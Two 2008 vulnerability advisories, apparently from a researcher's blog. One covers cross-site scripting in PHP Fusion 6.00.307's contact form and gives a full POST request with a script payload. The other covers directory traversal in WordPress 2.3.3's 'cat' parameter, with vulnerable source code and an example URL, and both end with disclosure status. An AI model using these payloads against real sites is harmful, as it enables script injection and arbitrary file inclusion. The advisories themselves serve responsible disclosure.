Thursday, May 1, 2008

PHP Fusion v.6.00.307 Cross-Site Scripting

Author: Gerendi Sandor Attila
Date: April 23, 2008
Package: PHP Fusion
Product Homepage: http://www.php-fusion.co.uk/
Versions Affected: v.6.00.307 (Other versions may also be affected)
Severity: XSS

Input passed to "subject" parameter in "contact.php" is not properly sanitized before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when malicious data is viewed.

Example:
POST http://somehost/phpfusion_6_00_307/contact.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 127.0.0.1
Content-Length: 115
Cookie: fusion_visited=yes
Connection: Close
Pragma: no-cache

sendmessage=Send%20Message&mailname=x&email=x&subject=<script>alert("xss")</script>&message=x

Status:
1. Contacted the author at April 23, 2008 via http://mantis.php-fusion.co.uk/.
2. No response

Tuesday, April 1, 2008

Wordpress v.2.3.3 Directory Traversal

Author: Gerendi Sandor Attila
Date: April 01, 2008
Package: Wordpress
Product Homepage: http://wordpress.org/
Versions Affected: v.2.3.3 (Other versions may also be affected)
Severity: High

The parameter “cat” in “index.php” is vulnerable to directory traversal attacks and possibly to arbitrary code inclusion/execution.

In “template-loader.php” line 35- 37 we have:
else if ( is_category() && $template = get_category_template()) {
include($template);
return;
the $template variable is supplied by the:
function get_category_template() {
$template = '';
if ( file_exists(TEMPLATEPATH . "/category-" . get_query_var('cat') . '.php') )
$template = TEMPLATEPATH . "/category-" . get_query_var('cat') . '.php';
elseif ( file_exists(TEMPLATEPATH . "/category.php") )
$template = TEMPLATEPATH . "/category.php";
return apply_filters('category_template', $template);
}
Here we see, we can inject values after “TEMPLATEPATH/category- ...”.
One interesting 'feature' in Windows XP (possibly in some other OS too) is that we can use an existing file as base for directory traversal. For example path like “c:\boot.ini\..\boot.ini” is valid and will point to “c:\boot.ini”.

So if the Wordpress is running on a box which behave like Windows XP and there is a category template on the server named “category-xx.php” we can include arbitrary php files from the server trough the “cat” parameter.

Example:

If we have template for category 1 (category-1.php)
“http://somehost/worpress/?cat=1.php/../searchform” will include the “searchform.php” from the curent template directory.

Status:
1. Contacted the author on April 01, 2008.
2. Author promptly responded with:
http://trac.wordpress.org/changeset/7586
This will be in our upcoming 2.5.1 release.